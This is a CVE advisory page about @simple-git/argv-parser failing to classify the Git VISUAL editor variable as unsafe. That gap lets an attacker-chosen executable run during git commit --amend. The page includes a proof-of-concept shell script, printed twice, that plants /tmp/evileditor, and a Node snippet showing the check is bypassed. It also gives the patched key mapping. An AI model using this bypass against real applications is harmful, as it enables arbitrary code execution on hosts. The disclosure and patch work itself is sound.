@simple-git/argv-parser, Security control bypass in Git VISUAL editor fallback not classified as allowUnsafeEditor, CVE ID: N/A (Unscored) -DC-Oct2026-2750

Listen to this Post

The reported issue affects @simple-git/argv-parser, a parser used to classify Git environment variables before spawn.
GitEnvKeys in packages/argv-parser/src/env/parse-env.ts maps editor, git_editor, and git_sequence_editor to allowUnsafeEditor.

It does not map VISUAL.

prepareEnv keeps an environment entry only when its lowercased name is a known GitEnvKey or starts with git.
Because visual is neither, VISUAL is dropped before collectConfigVulnerabilities inspects it.
Git itself falls back to VISUAL when resolving an editor.

Therefore parseEnv({ VISUAL: ‘/tmp/evileditor’ }) reports no vulnerability.

An interactive Git operation can still execute that binary.
In a consuming application, environment values derived from a request or job may be forwarded into the child Git environment.
The parser exists to classify exactly such values before spawn.

The equivalent EDITOR or GIT_EDITOR value is rejected.

The attacker gains an editor substitution that the guard is designed to block.

EDITOR is classified as allowUnsafeEditor via GitEnvKeys.

GIT_EDITOR is classified as allowUnsafeEditor via GitEnvKeys.

GIT_SEQUENCE_EDITOR is classified as allowUnsafeEditor via GitEnvKeys.

VISUAL is absent from GitEnvKeys and dropped by prepareEnv.

No vulnerability is emitted for VISUAL.

A consumer that allows attacker-influenced environment values can have an attacker-selected executable launched by Git.
This can occur during operations such as git commit –amend.

It bypasses the parser’s default unsafe-editor protection.

Execution happens as the host user running the Git child process.
The attacker’s binary is invoked against the repository’s editor file.

Examples include .git/COMMIT_EDITMSG.

Examples include .git/rebase-merge/git-rebase-todo for git rebase -i.

The new capability is the bypass itself.

Without this gap, the same value under EDITOR, GIT_EDITOR, or GIT_SEQUENCE_EDITOR is refused unless allowUnsafeEditor is enabled.
With VISUAL, code execution proceeds with no opt-in and no reported vulnerability.
VISUAL also takes precedence over EDITOR, which the parser does flag.
No CVSS vector or score is available in the source report.
Exploitability depends on whether attacker-influenced environment entries reach the Git child environment.
Consumers that never forward untrusted environment values into Git are not affected.
Consumers that always set a higher-priority GIT_EDITOR or core.editor are not affected.

DailyCVE Form:

Platform: @simple-git/argv-parser
Version: 1.1.1
Vulnerability: VISUAL allowUnsafeEditor bypass
Severity: Unscored
date: Not provided

Prediction: Expected date unknown

(end of form)

What Undercode Say:

Analytics

const GitEnvKeys = {
'editor': 'allowUnsafeEditor',
'git_editor': 'allowUnsafeEditor',
'git_sequence_editor': 'allowUnsafeEditor',
// VISUAL missing
} as const satisfies Record<string, VulnerabilityCategory>;
!/bin/sh
set -e
rm -rf /tmp/visual-repo /tmp/GIT_VISUAL_POC /tmp/evileditor
mkdir /tmp/visual-repo && cd /tmp/visual-repo
git init -q
git config user.email a@a && git config user.name a
touch a && git add a && git commit -qm init
printf '!/bin/sh\ntouch /tmp/GIT_VISUAL_POC\nexit 1\n' >/tmp/evileditor
chmod +x /tmp/evileditor
env -u EDITOR -u GIT_EDITOR VISUAL=/tmp/evileditor git commit --amend || true
test -e /tmp/GIT_VISUAL_POC && echo executed
import { vulnerabilityCheck } from '@simple-git/argv-parser';
import { spawnSync } from 'node:child_process';
const args = ['commit', '--amend'];
const env = { VISUAL: '/tmp/evileditor' };
if (vulnerabilityCheck(args, env).length === 0) spawnSync('git', args, { env });

Exploit: (Educational Purposes!)

rm -rf /tmp/visual-repo /tmp/GIT_VISUAL_POC /tmp/evileditor
mkdir /tmp/visual-repo && cd /tmp/visual-repo
git init -q
git config user.email a@a && git config user.name a
touch a && git add a && git commit -qm init
printf '!/bin/sh\ntouch /tmp/GIT_VISUAL_POC\nexit 1\n' >/tmp/evileditor
chmod +x /tmp/evileditor
env -u EDITOR -u GIT_EDITOR VISUAL=/tmp/evileditor git commit --amend || true
test -e /tmp/GIT_VISUAL_POC && echo executed

Protection: from this CVE

const GitEnvKeys = {
'editor': 'allowUnsafeEditor',
'visual': 'allowUnsafeEditor',
'git_editor': 'allowUnsafeEditor',
'git_sequence_editor': 'allowUnsafeEditor',
} as const satisfies Record<string, VulnerabilityCategory>;
parseEnv({ VISUAL: '/tmp/evileditor' }) // yields one allowUnsafeEditor vulnerability in every casing
vulnerabilityCheck(['commit', '--amend'], { VISUAL: '/tmp/evileditor' }) // returns vulnerability, not []

Impact:

A consuming application that allows attacker-influenced environment values can have an attacker-selected executable launched by Git during operations such as git commit –amend, bypassing the parser’s default unsafe-editor protection. Execution happens as the host user running the Git child process, with the attacker’s binary invoked against the repository’s editor file, for example .git/COMMIT_EDITMSG, or .git/rebase-merge/git-rebase-todo for git rebase -i. The new capability is the bypass itself: without this gap, the same attacker-supplied value under EDITOR, GIT_EDITOR, or GIT_SEQUENCE_EDITOR is refused unless the consumer explicitly opts in to allowUnsafeEditor. With VISUAL, the equivalent code execution proceeds with no opt-in and no reported vulnerability. VISUAL also takes precedence over EDITOR, the variable the parser does flag. No CVSS vector or score is available for this finding, and one is not asserted here. Exploitability depends on the consuming application’s data flow, specifically whether attacker-influenced environment entries reach the Git child environment. Consumers that never forward untrusted environment values into Git, or that always set a higher-priority GIT_EDITOR or core.editor, are not affected.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top